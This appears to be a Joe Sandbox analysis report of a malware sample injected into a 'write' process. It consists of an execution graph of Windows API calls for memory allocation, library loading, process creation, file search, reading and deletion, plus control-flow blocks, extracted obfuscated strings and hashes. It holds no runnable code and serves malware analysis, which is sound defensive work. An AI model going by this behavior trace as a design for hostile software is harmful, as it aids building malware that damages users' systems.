                                                                      execution_graph 95881 2fc9270 95883 2fc927f 95881->95883 95882 2fc92c0 95883->95882 95884 2fc92ad CreateThread 95883->95884 95885 2fcadf0 95886 2fcadfa 95885->95886 95889 2fe97b0 95886->95889 95888 2fcc461 95892 2fe7ac0 95889->95892 95891 2fe97e1 95891->95888 95893 2fe7b43 95892->95893 95895 2fe7ae4 95892->95895 95894 2fe7b59 NtAllocateVirtualMemory 95893->95894 95894->95891 95895->95891 95896 2fde8f0 95897 2fde954 95896->95897 95925 2fd5930 95897->95925 95899 2fdea84 95900 2fdea7d 95900->95899 95932 2fd5a40 95900->95932 95902 2fdec23 95903 2fdeb00 95903->95902 95904 2fdec32 95903->95904 95936 2fde6d0 95903->95936 95905 2fe7970 NtClose 95904->95905 95908 2fdec3c 95905->95908 95907 2fdeb35 95907->95904 95909 2fdeb40 95907->95909 95945 2fe9920 95909->95945 95911 2fdeb69 95912 2fdeb88 95911->95912 95913 2fdeb72 95911->95913 95948 2fde5c0 CoInitialize 95912->95948 95914 2fe7970 NtClose 95913->95914 95916 2fdeb7c 95914->95916 95917 2fdeb96 95950 2fe7470 95917->95950 95919 2fdec12 95954 2fe7970 95919->95954 95921 2fdec1c 95957 2fe9840 95921->95957 95923 2fdebb4 95923->95919 95924 2fe7470 LdrInitializeThunk 95923->95924 95924->95923 95926 2fd593a 95925->95926 95927 2fd5987 95926->95927 95960 2fe7520 95926->95960 95927->95900 95929 2fd59aa 95929->95927 95930 2fe7970 NtClose 95929->95930 95931 2fd5a2a 95930->95931 95931->95900 95933 2fd5a65 95932->95933 95965 2fe7310 95933->95965 95937 2fde6ec 95936->95937 95970 2fd3e10 95937->95970 95939 2fde713 95939->95907 95940 2fde70a 95940->95939 95941 2fd3e10 LdrLoadDll 95940->95941 95942 2fde7de 95941->95942 95943 2fd3e10 LdrLoadDll 95942->95943 95944 2fde83b 95942->95944 95943->95944 95944->95907 95974 2fe7c70 95945->95974 95947 2fe993b 95947->95911 95949 2fde625 95948->95949 95949->95917 95951 2fe748d 95950->95951 95977 5202ac0 LdrInitializeThunk 95951->95977 95952 2fe74bd 95952->95923 95955 2fe798d 95954->95955 95956 2fe799e NtClose 95955->95956 95956->95921 95978 2fe7cc0 95957->95978 95959 2fe9859 95959->95902 95961 2fe753a 95960->95961 95964 5202bc0 LdrInitializeThunk 95961->95964 95962 2fe7566 95962->95929 95964->95962 95966 2fe732a 95965->95966 95969 5202b80 LdrInitializeThunk 95966->95969 95967 2fd5ad9 95967->95903 95969->95967 95971 2fd3e34 95970->95971 95972 2fd3e3b 95971->95972 95973 2fd3e70 LdrLoadDll 95971->95973 95972->95940 95973->95972 95975 2fe7c8a 95974->95975 95976 2fe7c9b RtlAllocateHeap 95975->95976 95976->95947 95977->95952 95979 2fe7cda 95978->95979 95980 2fe7ceb RtlFreeHeap 95979->95980 95980->95959 95981 2fda070 95986 2fd9da0 95981->95986 95983 2fda07d 96002 2fd9a40 95983->96002 95985 2fda099 95987 2fd9dc5 95986->95987 96014 2fd7720 95987->96014 95990 2fd9f02 95990->95983 95992 2fd9f19 95992->95983 95993 2fd9f10 95993->95992 95997 2fda001 95993->95997 96029 2fe38a0 95993->96029 96034 2fd94a0 95993->96034 95996 2fe38a0 GetFileAttributesW 95996->95997 95997->95996 95999 2fda059 95997->95999 96043 2fd9800 95997->96043 96000 2fe9840 RtlFreeHeap 95999->96000 96001 2fda060 96000->96001 96001->95983 96003 2fd9a56 96002->96003 96006 2fd9a61 96002->96006 96004 2fe9920 RtlAllocateHeap 96003->96004 96004->96006 96005 2fd9a77 96005->95985 96006->96005 96007 2fd7720 GetFileAttributesW 96006->96007 96008 2fd9d6e 96006->96008 96011 2fe38a0 GetFileAttributesW 96006->96011 96012 2fd94a0 RtlFreeHeap 96006->96012 96013 2fd9800 RtlFreeHeap 96006->96013 96007->96006 96009 2fd9d87 96008->96009 96010 2fe9840 RtlFreeHeap 96008->96010 96009->95985 96010->96009 96011->96006 96012->96006 96013->96006 96015 2fd7726 96014->96015 96016 2fd7753 96015->96016 96017 2fd7748 GetFileAttributesW 96015->96017 96016->95990 96018 2fe1e10 96016->96018 96017->96016 96019 2fe1e1e 96018->96019 96020 2fe1e25 96018->96020 96019->95993 96021 2fd3e10 LdrLoadDll 96020->96021 96022 2fe1e5a 96021->96022 96023 2fe1e69 96022->96023 96047 2fe18e0 LdrLoadDll 96022->96047 96025 2fe9920 RtlAllocateHeap 96023->96025 96027 2fe2004 96023->96027 96028 2fe1e82 96025->96028 96026 2fe9840 RtlFreeHeap 96026->96027 96027->95993 96028->96026 96028->96027 96030 2fe38fd 96029->96030 96031 2fe3934 96030->96031 96048 2fd7770 96030->96048 96031->95993 96033 2fe3916 96033->95993 96035 2fd94c6 96034->96035 96052 2fdcce0 96035->96052 96037 2fd952d 96039 2fd96b0 96037->96039 96041 2fd954b 96037->96041 96038 2fd9695 96038->95993 96039->96038 96040 2fd9360 RtlFreeHeap 96039->96040 96040->96039 96041->96038 96057 2fd9360 96041->96057 96044 2fd9826 96043->96044 96045 2fdcce0 RtlFreeHeap 96044->96045 96046 2fd98a2 96045->96046 96046->95997 96047->96023 96049 2fd7726 96048->96049 96050 2fd7748 GetFileAttributesW 96049->96050 96051 2fd7753 96049->96051 96050->96051 96051->96033 96054 2fdccf6 96052->96054 96053 2fdcd03 96053->96037 96054->96053 96055 2fe9840 RtlFreeHeap 96054->96055 96056 2fdcd3c 96055->96056 96056->96037 96058 2fd9376 96057->96058 96061 2fdcd50 96058->96061 96060 2fd947c 96060->96041 96062 2fdcd74 96061->96062 96063 2fdce0c 96062->96063 96064 2fe9840 RtlFreeHeap 96062->96064 96063->96060 96064->96063 96065 2fd67b0 96066 2fd67cc 96065->96066 96068 2fd6819 96065->96068 96067 2fe7970 NtClose 96066->96067 96066->96068 96069 2fd67e4 96067->96069 96074 2fd6942 96068->96074 96076 2fd5bc0 NtClose LdrInitializeThunk LdrInitializeThunk 96068->96076 96075 2fd5bc0 NtClose LdrInitializeThunk LdrInitializeThunk 96069->96075 96071 2fd691c 96071->96074 96077 2fd5d90 NtClose LdrInitializeThunk LdrInitializeThunk 96071->96077 96075->96068 96076->96071 96077->96074 96078 2fd6970 96079 2fd6988 96078->96079 96081 2fd69e2 96078->96081 96079->96081 96082 2fda570 96079->96082 96083 2fda596 96082->96083 96084 2fda7af 96083->96084 96109 2fe7d50 96083->96109 96084->96081 96086 2fda60c 96086->96084 96112 2feaa50 96086->96112 96088 2fda628 96088->96084 96089 2fda6f6 96088->96089 96118 2fe7020 96088->96118 96091 2fd5040 LdrInitializeThunk 96089->96091 96093 2fda712 96089->96093 96091->96093 96108 2fda797 96093->96108 96129 2fe6bf0 96093->96129 96094 2fda68d 96094->96084 96102 2fda6bc 96094->96102 96104 2fda6de 96094->96104 96122 2fd5040 96094->96122 96096 2fd74d0 LdrInitializeThunk 96101 2fda7a5 96096->96101 96101->96081 96144 2fe31e0 LdrInitializeThunk 96102->96144 96103 2fda76e 96134 2fe6c90 96103->96134 96125 2fd74d0 96104->96125 96106 2fda788 96139 2fe6dd0 96106->96139 96108->96096 96110 2fe7d6d 96109->96110 96111 2fe7d7e CreateProcessInternalW 96110->96111 96111->96086 96113 2fea9c0 96112->96113 96114 2fe9920 RtlAllocateHeap 96113->96114 96115 2feaa1d 96113->96115 96116 2fea9fa 96114->96116 96115->96088 96117 2fe9840 RtlFreeHeap 96116->96117 96117->96115 96119 2fe703a 96118->96119 96145 5202b2a 96119->96145 96120 2fda684 96120->96089 96120->96094 96148 2fe71e0 96122->96148 96124 2fd507e 96124->96102 96126 2fd74e3 96125->96126 96154 2fe6f30 96126->96154 96128 2fd750e 96128->96081 96130 2fe6c58 96129->96130 96132 2fe6c11 96129->96132 96160 52038d0 LdrInitializeThunk 96130->96160 96131 2fe6c7d 96131->96103 96132->96103 96135 2fe6cf8 96134->96135 96136 2fe6cb1 96134->96136 96161 5204260 LdrInitializeThunk 96135->96161 96136->96106 96137 2fe6d1d 96137->96106 96140 2fe6e38 96139->96140 96141 2fe6df1 96139->96141 96162 5202ed0 LdrInitializeThunk 96140->96162 96141->96108 96142 2fe6e5d 96142->96108 96144->96104 96146 5202b31 96145->96146 96147 5202b3f LdrInitializeThunk 96145->96147 96146->96120 96147->96120 96149 2fe727b 96148->96149 96151 2fe7204 96148->96151 96153 5202c30 LdrInitializeThunk 96149->96153 96150 2fe72c0 96150->96124 96151->96124 96153->96150 96155 2fe6f99 96154->96155 96156 2fe6f51 96154->96156 96159 5202cf0 LdrInitializeThunk 96155->96159 96156->96128 96157 2fe6fbe 96157->96128 96159->96157 96160->96131 96161->96137 96162->96142 96163 2fe76b0 96164 2fe774e 96163->96164 96166 2fe76d1 96163->96166 96165 2fe7764 NtCreateFile 96164->96165 96167 2fe6e70 96168 2fe6eed 96167->96168 96169 2fe6e94 96167->96169 96172 5202e00 LdrInitializeThunk 96168->96172 96170 2fe6f1e 96172->96170 96173 52029f0 LdrInitializeThunk 96174 2fd63e0 96175 2fd640a 96174->96175 96178 2fd7300 96175->96178 96177 2fd6434 96179 2fd731d 96178->96179 96185 2fe7110 96179->96185 96181 2fd736d 96182 2fd7374 96181->96182 96183 2fe71e0 LdrInitializeThunk 96181->96183 96182->96177 96184 2fd739d 96183->96184 96184->96177 96186 2fe7196 96185->96186 96188 2fe7131 96185->96188 96190 5202e50 LdrInitializeThunk 96186->96190 96187 2fe71cf 96187->96181 96188->96181 96190->96187 96191 2fe78e0 96192 2fe7945 96191->96192 96194 2fe7904 96191->96194 96193 2fe795b NtDeleteFile 96192->96193 96195 2fe49a0 96196 2fe49fa 96195->96196 96198 2fe4a07 96196->96198 96199 2fe2530 96196->96199 96200 2fe97b0 NtAllocateVirtualMemory 96199->96200 96201 2fe2571 96200->96201 96202 2fd3e10 LdrLoadDll 96201->96202 96204 2fe2676 96201->96204 96205 2fe25b7 96202->96205 96203 2fe25f0 Sleep 96203->96205 96204->96198 96205->96203 96205->96204 96213 2fd209a 96214 2fd20c8 96213->96214 96215 2fd5930 2 API calls 96214->96215 96216 2fd20d3 96215->96216 96217 2fc92d0 96218 2fc9693 96217->96218 96220 2fc9b61 96218->96220 96221 2fe94d0 96218->96221 96222 2fe94f6 96221->96222 96227 2fc3cd0 96222->96227 96224 2fe9502 96225 2fe9530 96224->96225 96230 2fe3fe0 96224->96230 96225->96220 96234 2fd2b40 96227->96234 96229 2fc3cdd 96229->96224 96231 2fe403a 96230->96231 96233 2fe4047 96231->96233 96270 2fd0fe0 96231->96270 96233->96225 96236 2fd2b57 96234->96236 96235 2fd2b70 96235->96229 96236->96235 96241 2fe83a0 96236->96241 96238 2fd2bc1 96238->96235 96248 2fe46a0 96238->96248 96240 2fd2be7 96240->96229 96243 2fe83b8 96241->96243 96242 2fe83dc 96242->96238 96243->96242 96244 2fe7020 LdrInitializeThunk 96243->96244 96245 2fe8431 96244->96245 96246 2fe9840 RtlFreeHeap 96245->96246 96247 2fe844a 96246->96247 96247->96238 96249 2fe46fd 96248->96249 96250 2fe4728 96249->96250 96253 2fd27c0 96249->96253 96250->96240 96252 2fe470a 96252->96240 96254 2fd27d7 96253->96254 96258 2fd278f 96254->96258 96259 2fd7150 96254->96259 96257 2fe7970 NtClose 96257->96258 96258->96252 96260 2fd716a 96259->96260 96264 2fd2a3c 96259->96264 96265 2fe70c0 96260->96265 96263 2fe7970 NtClose 96263->96264 96264->96257 96264->96258 96266 2fe70da 96265->96266 96269 52034e0 LdrInitializeThunk 96266->96269 96267 2fd723a 96267->96263 96269->96267 96271 2fd101b 96270->96271 96286 2fd7260 96271->96286 96273 2fd1023 96274 2fe9920 RtlAllocateHeap 96273->96274 96285 2fd12e5 96273->96285 96275 2fd1039 96274->96275 96276 2fe9920 RtlAllocateHeap 96275->96276 96277 2fd104a 96276->96277 96278 2fe9920 RtlAllocateHeap 96277->96278 96280 2fd105b 96278->96280 96281 2fd10eb 96280->96281 96301 2fd6090 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96280->96301 96282 2fd3e10 LdrLoadDll 96281->96282 96283 2fd12a5 96282->96283 96297 2fe6700 96283->96297 96285->96233 96287 2fd728c 96286->96287 96288 2fd7150 2 API calls 96287->96288 96289 2fd72af 96288->96289 96290 2fd72b9 96289->96290 96291 2fd72d1 96289->96291 96292 2fd72c4 96290->96292 96294 2fe7970 NtClose 96290->96294 96293 2fd72ed 96291->96293 96295 2fe7970 NtClose 96291->96295 96292->96273 96293->96273 96294->96292 96296 2fd72e3 96295->96296 96296->96273 96298 2fe675a 96297->96298 96300 2fe6767 96298->96300 96302 2fd1300 96298->96302 96300->96285 96301->96281 96304 2fd1320 96302->96304 96318 2fd7530 96302->96318 96312 2fd1805 96304->96312 96322 2fe0190 96304->96322 96307 2fd1521 96308 2feaa50 2 API calls 96307->96308 96310 2fd1536 96308->96310 96309 2fd137e 96309->96312 96326 2fea920 96309->96326 96314 2fd1561 96310->96314 96331 2fcffa0 96310->96331 96311 2fd74d0 LdrInitializeThunk 96311->96314 96312->96300 96314->96311 96314->96312 96315 2fcffa0 LdrInitializeThunk 96314->96315 96315->96314 96316 2fd168f 96316->96314 96317 2fd74d0 LdrInitializeThunk 96316->96317 96317->96316 96319 2fd753d 96318->96319 96320 2fd755e SetErrorMode 96319->96320 96321 2fd7565 96319->96321 96320->96321 96321->96304 96323 2fe01a3 96322->96323 96324 2fe97b0 NtAllocateVirtualMemory 96323->96324 96325 2fe01b1 96324->96325 96325->96309 96327 2fea936 96326->96327 96328 2fea930 96326->96328 96329 2fe9920 RtlAllocateHeap 96327->96329 96328->96307 96330 2fea95c 96329->96330 96330->96307 96332 2fcffc2 96331->96332 96334 2fe7bd0 96331->96334 96332->96316 96335 2fe7bed 96334->96335 96338 5202b90 LdrInitializeThunk 96335->96338 96336 2fe7c15 96336->96332 96338->96336 96339 2fdb810 96340 2fdb839 96339->96340 96341 2fdb93d 96340->96341 96342 2fdb8e3 FindFirstFileW 96340->96342 96342->96341 96343 2fdb8fe 96342->96343 96344 2fdb924 FindNextFileW 96343->96344 96344->96343 96345 2fdb936 FindClose 96344->96345 96345->96341 96346 2fdf1d0 96347 2fdf1d9 96346->96347 96348 2fd3e10 LdrLoadDll 96347->96348 96349 2fdf20b 96348->96349 96350 2fd5150 96351 2fe7020 LdrInitializeThunk 96350->96351 96352 2fd5186 96351->96352 96355 2fe7a00 96352->96355 96354 2fd519b 96356 2fe7a7d 96355->96356 96358 2fe7a24 96355->96358 96360 5202da0 LdrInitializeThunk 96356->96360 96357 2fe7aae 96357->96354 96358->96354 96360->96357 96366 2fe6fd0 96367 2fe6fea 96366->96367 96370 5202d10 LdrInitializeThunk 96367->96370 96368 2fe7012 96370->96368 96371 2fe0b50 96376 2fe0b5f 96371->96376 96372 2fe0be6 96373 2fe0ba3 96374 2fe9840 RtlFreeHeap 96373->96374 96375 2fe0bb3 96374->96375 96376->96372 96376->96373 96377 2fe0be1 96376->96377 96378 2fe9840 RtlFreeHeap 96377->96378 96378->96372 96379 2fe0351 96391 2fe7800 96379->96391 96381 2fe0372 96382 2fe03a5 96381->96382 96383 2fe0390 96381->96383 96385 2fe7970 NtClose 96382->96385 96384 2fe7970 NtClose 96383->96384 96386 2fe0399 96384->96386 96388 2fe03ae 96385->96388 96387 2fe03da 96388->96387 96389 2fe9840 RtlFreeHeap 96388->96389 96390 2fe03ce 96389->96390 96392 2fe7892 96391->96392 96394 2fe7821 96391->96394 96393 2fe78a8 NtReadFile 96392->96393 96393->96381 96394->96381 96396 2fd048b PostThreadMessageW 96397 2fd049d 96396->96397 96398 2fd8f8b 96400 2fd8f9a 96398->96400 96399 2fd8fa1 96400->96399 96401 2fe9840 RtlFreeHeap 96400->96401 96401->96399 96402 2fd7b81 96403 2fd7b72 96402->96403 96404 2fd7b86 96402->96404 96404->96403 96406 2fd6600 LdrInitializeThunk LdrInitializeThunk 96404->96406 96406->96403 96407 2fd50c0 96408 2fd74d0 LdrInitializeThunk 96407->96408 96409 2fd50f0 96408->96409 96411 2fd511c 96409->96411 96412 2fd7450 96409->96412 96413 2fd7494 96412->96413 96418 2fd74b5 96413->96418 96419 2fe6d30 96413->96419 96415 2fd74a5 96416 2fd74c1 96415->96416 96417 2fe7970 NtClose 96415->96417 96416->96409 96417->96418 96418->96409 96420 2fe6d54 96419->96420 96421 2fe6d9b 96419->96421 96420->96415 96424 5204570 LdrInitializeThunk 96421->96424 96422 2fe6dc0 96422->96415 96424->96422 96425 2fe07c0 96426 2fe07dc 96425->96426 96427 2fe0818 96426->96427 96428 2fe0804 96426->96428 96429 2fe7970 NtClose 96427->96429 96430 2fe7970 NtClose 96428->96430 96431 2fe0821 96429->96431 96432 2fe080d 96430->96432 96435 2fe9960 RtlAllocateHeap 96431->96435 96434 2fe082c 96435->96434 96441 2fea980 96442 2fe9840 RtlFreeHeap 96441->96442 96443 2fea995 96442->96443

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 43 2fc92d0-2fc9691 44 2fc96a2-2fc96ae 43->44 45 2fc96b0-2fc96bf 44->45 46 2fc96c1 44->46 45->44 48 2fc96c8-2fc96e1 46->48 48->48 49 2fc96e3-2fc96e7 48->49 50 2fc96e9-2fc9708 49->50 51 2fc970a-2fc9711 49->51 50->49 52 2fc973e-2fc974e 51->52 53 2fc9713-2fc973c 51->53 54 2fc9755-2fc975c 52->54 53->51 55 2fc978e-2fc9798 54->55 56 2fc975e-2fc978c 54->56 57 2fc97a9-2fc97b5 55->57 56->54 58 2fc97d7-2fc97e1 57->58 59 2fc97b7-2fc97c7 57->59 62 2fc97f2-2fc97fb 58->62 60 2fc97c9-2fc97d2 59->60 61 2fc97d5 59->61 60->61 61->57 64 2fc97fd-2fc980f 62->64 65 2fc9811-2fc981b 62->65 64->62 67 2fc9821-2fc982b 65->67 68 2fc982d-2fc984c 67->68 69 2fc985f 67->69 70 2fc985d 68->70 71 2fc984e-2fc9857 68->71 72 2fc9866-2fc986f 69->72 70->67 71->70 73 2fc99dc-2fc99e3 72->73 74 2fc9875-2fc987c 72->74 77 2fc9a0a-2fc9a14 73->77 78 2fc99e5-2fc9a08 73->78 75 2fc987e-2fc98a1 74->75 76 2fc98a3-2fc98b2 74->76 75->74 79 2fc98b8-2fc98bf 76->79 80 2fc9a25-2fc9a2e 77->80 78->73 81 2fc98f6-2fc9905 79->81 82 2fc98c1-2fc98f4 79->82 83 2fc9a3e-2fc9a57 80->83 84 2fc9a30-2fc9a3c 80->84 85 2fc998f-2fc9999 81->85 86 2fc990b-2fc9915 81->86 82->79 83->83 88 2fc9a59-2fc9a63 83->88 84->80 91 2fc99cd-2fc99d7 85->91 92 2fc999b-2fc99ba 85->92 89 2fc9926-2fc9932 86->89 90 2fc9a74-2fc9a7d 88->90 95 2fc9934-2fc9940 89->95 96 2fc9942-2fc9959 89->96 97 2fc9a7f-2fc9a8b 90->97 98 2fc9a9b-2fc9aa5 90->98 91->72 93 2fc99bc-2fc99c5 92->93 94 2fc99cb 92->94 93->94 94->85 95->89 101 2fc996a-2fc9976 96->101 102 2fc9a8d-2fc9a93 97->102 103 2fc9a99 97->103 99 2fc9ab6-2fc9ac2 98->99 105 2fc9ae4-2fc9aeb 99->105 106 2fc9ac4-2fc9ad1 99->106 107 2fc998d 101->107 108 2fc9978-2fc998b 101->108 102->103 103->90 111 2fc9ba9-2fc9bb0 105->111 112 2fc9af1-2fc9afd 105->112 109 2fc9ae2 106->109 110 2fc9ad3-2fc9adc 106->110 107->73 108->101 109->99 110->109 116 2fc9be1-2fc9beb 111->116 117 2fc9bb2-2fc9bdf 111->117 115 2fc9b03-2fc9b0a 112->115 118 2fc9b5c call 2fe94d0 115->118 119 2fc9b0c-2fc9b2c 115->119 117->111 123 2fc9b61-2fc9b6b 118->123 120 2fc9b2e-2fc9b32 119->120 121 2fc9b33-2fc9b35 119->121 120->121 124 2fc9b46-2fc9b5a 121->124 125 2fc9b37-2fc9b40 121->125 126 2fc9b7c-2fc9b85 123->126 124->115 125->124 126->111 127 2fc9b87-2fc9b93 126->127 128 2fc9b9a-2fc9b9c 127->128 129 2fc9b95-2fc9b99 127->129 130 2fc9b9e-2fc9ba4 128->130 131 2fc9ba7 128->131 129->128 130->131 131->126
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$"$$$%z$&!$-7$.$8/$:$:$@D$Nr$O$U$UF$X$XW$[$^U$_q$b$c;$f$l$n$p$tK$u$z$|$|
                                                                      • API String ID: 0-966926751
                                                                      • Opcode ID: ccc1cd6ab63397257da40c39b27d3e1671cd5b5f73d992f6c1cdb89d84a220f8
                                                                      • Instruction ID: 6492cba0d51bb7f822a61c81cd2e61c94269fb3b85fee91f5086417fa1047e77
                                                                      • Opcode Fuzzy Hash: ccc1cd6ab63397257da40c39b27d3e1671cd5b5f73d992f6c1cdb89d84a220f8
                                                                      • Instruction Fuzzy Hash: 1632A1B0E05229CFEB24CF45C954BEDBBB2BB45308F2081D9D14D6B291CBB95A89CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FDB8F4
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02FDB92F
                                                                      • FindClose.KERNELBASE(?), ref: 02FDB93A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 21e005875b0c7b932f36bbc9dbccd5be1e402712fafd25961653530f9913b36f
                                                                      • Instruction ID: bcfdf1a201a043482a2bb1d7d333b66ae74b14f4f782556cc4a561deb9c5a09d
                                                                      • Opcode Fuzzy Hash: 21e005875b0c7b932f36bbc9dbccd5be1e402712fafd25961653530f9913b36f
                                                                      • Instruction Fuzzy Hash: A13190B19002497BDB20EFA4CD95FFF777D9F44788F244458BA09A7180DA70AA84CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02FE7795
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: e781e015f5b553a5ce44b153aa31decf02e1ab21d1b06a36d03cc0914bc86bbc
                                                                      • Instruction ID: ea3268746307d4eb8864da09c54f24fe47ac591945ab01192012bf2bddeb6e23
                                                                      • Opcode Fuzzy Hash: e781e015f5b553a5ce44b153aa31decf02e1ab21d1b06a36d03cc0914bc86bbc
                                                                      • Instruction Fuzzy Hash: 3231C3B5A01209ABCB14DF98DC80EDFB7B9AF8C754F108219FA19A7340D770A8118FA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02FE78D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 85a8feeb321cc1a4107a12ef65982b1488e8350cc4623e57efc19a80debd0cb4
                                                                      • Instruction ID: 5a70e34e377dfa31296c75e95b0a51d9161f9a06862af3378f1f55b1b56b45f0
                                                                      • Opcode Fuzzy Hash: 85a8feeb321cc1a4107a12ef65982b1488e8350cc4623e57efc19a80debd0cb4
                                                                      • Instruction Fuzzy Hash: 5931EAB1A00209AFDB14DF59DC80EEF77B9EF88754F104219F919A7240D770A811CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(02FD137E,?,02FE6767,00000000,00000004,00003000,?,?,?,?,?,02FE6767,02FD137E,02FE6767,52511CC4,02FD137E), ref: 02FE7B76
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 8f7aace665b8c7e07a0a710b8c66c94054f6619566217540e487520006f1d731
                                                                      • Instruction ID: 39fe0fa27b970e32cbe5808f12f3ec56ed69b6e3a98c8cb540100dd75ecf04e3
                                                                      • Opcode Fuzzy Hash: 8f7aace665b8c7e07a0a710b8c66c94054f6619566217540e487520006f1d731
                                                                      • Instruction Fuzzy Hash: AA212FB1A00249ABDB14DF58DC41FAFB7BAEF88754F104509FE19A7240D770A911CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5598071db94923eee74773c8ee4ca8f727c25d1bf74f4a6c06d581db5085786c
                                                                      • Instruction ID: e6cacddf5371c9206535811c9461c9f79c84fd23a115f2433f5960b9eceb3701
                                                                      • Opcode Fuzzy Hash: 5598071db94923eee74773c8ee4ca8f727c25d1bf74f4a6c06d581db5085786c
                                                                      • Instruction Fuzzy Hash: 4301C471A00204BBDA10EBA4CC01FAB73ADDF85750F10451DFB0997181DBB0B911CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(?,02FD2A3C,001F0001,?,00000000,?,02FE470A,00000104), ref: 02FE79A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: d40c05fe5bb3c403baf95651db62498e6630252b14d03dfc938d38f5934c72ef
                                                                      • Instruction ID: a0e0e6862c4d9e11aaa021f089be3a4ce8907de98852ec343c81b012be729652
                                                                      • Opcode Fuzzy Hash: d40c05fe5bb3c403baf95651db62498e6630252b14d03dfc938d38f5934c72ef
                                                                      • Instruction Fuzzy Hash: 11E08C367002447BD620FA59CC01FDB776EDFC6BA0F118419FA09A7241C6B0B9118BF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 97f9859fdbb105da9ba633ea6a62ef6b93f514ea863e7b15d1b1cca56e0bcba9
                                                                      • Instruction ID: 0f5ca00d6eb445d2e7a4e2618b3ffa1aea86d26d01d4686b361a82b3773f330f
                                                                      • Opcode Fuzzy Hash: 97f9859fdbb105da9ba633ea6a62ef6b93f514ea863e7b15d1b1cca56e0bcba9
                                                                      • Instruction Fuzzy Hash: 189002616111044245407158498440770969BF13017D2C519A4544560CCA688856A26D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
